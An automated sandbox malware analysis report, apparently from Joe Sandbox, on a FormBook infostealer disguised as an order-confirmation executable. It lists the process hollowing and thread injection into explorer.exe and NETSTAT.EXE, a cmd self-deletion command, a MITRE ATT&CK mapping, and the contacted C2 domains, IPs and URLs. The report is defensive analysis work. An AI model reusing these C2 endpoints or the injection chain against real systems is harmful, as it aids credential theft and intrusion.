          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ECAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5A354 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.120.228.88 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.249.115.168 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 46.38.226.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.99.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.13.31.214 80
          Source: C:\Windows\explorer.exeNetwork Connect: 149.210.170.235 80
          Source: C:\Windows\explorer.exeNetwork Connect: 69.163.224.168 80
          Source: C:\Windows\explorer.exeNetwork Connect: 51.195.43.214 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.0.139.114 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.254.186.135 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.204.140.233 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe base address: 400000
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3D0000
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B89369 LogonUserW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,KiUserCallbackDispatcher,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B951E2 mouse_event,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B94F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259950847.00000000027A4000.00000004.00000001.sdmp, lqqebhptsg.exe, 00000001.00000002.251766943.0000000000BE6000.00000002.00020000.sdmp, 9rd1hxro.exe, 00000002.00000000.242902621.00000000004B6000.00000002.00020000.sdmp, NETSTAT.EXE, 0000000C.00000002.628326258.0000000003B0D000.00000004.00000001.sdmp, 9rd1hxro.exe.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: lqqebhptsg.exe, explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000002.625354816.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000002.626152318.0000000001640000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.628714673.00000000055C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5885B cpuid
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B70030 GetLocalTime,__swprintf,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B70722 GetUserNameW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B6416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: lqqebhptsg.exeBinary or memory string: WIN_81
          Source: lqqebhptsg.exeBinary or memory string: WIN_XP
          Source: lqqebhptsg.exeBinary or memory string: WIN_XPe
          Source: lqqebhptsg.exeBinary or memory string: WIN_VISTA
          Source: lqqebhptsg.exeBinary or memory string: WIN_7
          Source: lqqebhptsg.exeBinary or memory string: WIN_8
          Source: 9rd1hxro.exe.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BA696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BA6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2Native API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools1Input Capture21System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Valid Accounts2Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Valid Accounts2Obfuscated Files or Information3Security Account ManagerSystem Network Connections Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Access Token Manipulation21Software Packing11NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptProcess Injection512Valid Accounts2LSA SecretsSystem Information Discovery115SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsSecurity Software Discovery261VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation21DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection512Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Network Configuration Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 344999 Sample: Order confirmation 64236000... Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 5 other signatures 2->48 11 Order confirmation 64236000000025 26.01.2021.exe 13 2->11         started        process3 file4 32 C:\Users\user\AppData\...\lqqebhptsg.exe, PE32 11->32 dropped 14 lqqebhptsg.exe 1 11->14         started        process5 file6 34 C:\Users\user\AppData\Local\...\9rd1hxro.exe, PE32 14->34 dropped 66 Maps a DLL or memory area into another process 14->66 68 Sample uses process hollowing technique 14->68 18 9rd1hxro.exe 14->18         started        signatures7 process8 signatures9 50 Multi AV Scanner detection for dropped file 18->50 52 Detected unpacking (changes PE section rights) 18->52 54 Modifies the context of a thread in another process (thread injection) 18->54 56 4 other signatures 18->56 21 explorer.exe 18->21 injected process10 dnsIp11 36 taxandbookkeepingsolutions.com 192.254.186.135, 49732, 49747, 80 UNIFIEDLAYER-AS-1US United States 21->36 38 expand.care 149.210.170.235, 49734, 49759, 80 TRANSIP-ASAmsterdamtheNetherlandsNL Netherlands 21->38 40 21 other IPs or domains 21->40 58 System process connects to network (likely due to code injection or exploit) 21->58 25 NETSTAT.EXE 21->25         started        signatures12 process13 signatures14 60 Modifies the context of a thread in another process (thread injection) 25->60 62 Maps a DLL or memory area into another process 25->62 64 Tries to detect virtualization through RDTSC time measurements 25->64 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Order confirmation 64236000000025 26.01.2021.exe50%ReversingLabsWin32.Trojan.Doina
          Order confirmation 64236000000025 26.01.2021.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe21%ReversingLabsWin32.PUA.Wacapew
          C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe5%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.lqqebhptsg.exe.4dc0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.9rd1hxro.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.Order confirmation 64236000000025 26.01.2021.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.Order confirmation 64236000000025 26.01.2021.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          2.1.9rd1hxro.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          https://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.alliswell.info/bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.swiftappliancessc.com/bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.state728.com/bnuw/?Mv0h=UaN922MvMgW8WO4gu4dCtZfuQaKmG0MLXVbxDGTLVk691LjZJH+3nMRa/tXw417tQlSj&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.rotalablog.com/bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.beachesvr.com/bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.secretlairtoys.com/bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.dmvantalya.com/bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.secretlairtoys.com/0%Avira URL Cloudsafe
          http://www.ekpays.com/bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.taxandbookkeepingsolutions.com/bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH0%Avira URL Cloudsafe
          http://www.czb878.com/bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.alliswell.info
          		51.195.43.214
          		truetrue
            		unknown
            secretlairtoys.com
            		192.249.115.168
            		truetrue
              		unknown
              taxandbookkeepingsolutions.com
              		192.254.186.135
              		truetrue
                		unknown
                www.husum-ferienwohnungen.com
                		46.38.226.47
                		truetrue
                  		unknown
                  www.rotalablog.com
                  		118.27.99.25
                  		truetrue
                    		unknown
                    swiftappliancessc.com
                    		184.168.131.241
                    		truetrue
                      		unknown
                      www.dmvantalya.com
                      		154.204.140.233
                      		truetrue
                        		unknown
                        brendonellis.com
                        		192.0.78.25
                        		truetrue
                          		unknown
                          beachesvr.com
